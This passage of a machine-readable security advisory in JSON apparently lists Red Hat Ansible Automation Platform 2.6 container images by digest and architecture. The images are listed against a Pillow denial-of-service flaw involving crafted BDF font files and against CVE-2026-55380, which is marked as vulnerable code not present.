"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
